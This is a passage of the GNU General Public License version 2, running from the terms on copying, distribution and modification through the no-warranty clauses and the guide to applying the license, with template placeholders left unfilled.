COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. {description} Copyright (C) {year} {fullname} This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. {signature of Ty Coon}, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License.